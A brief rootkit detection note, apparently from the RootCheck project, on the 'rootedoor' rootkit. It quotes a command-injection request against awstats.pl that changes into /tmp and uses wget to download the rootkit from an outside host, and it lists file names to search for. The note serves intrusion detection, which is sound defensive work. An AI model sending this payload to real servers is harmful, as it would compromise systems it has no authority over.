Information about the rootedoor rootkit

This rootkit was used on many attacks to awstats. A common entry on vulnerable
servers would be the following:

"GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20..; \
cd%20..;cd%20tmp;wget%20http://members.aol.com/cavaleirosb1/xpl/rootedoor

Files to search:

*rootedoor

*All files with an "*" need to be search in all system
**If you have any more information, send to: mail1, or to mail2.

$RootCheck: rootedoor.php, v1.0 2005/10/25, Daniel B. Cid$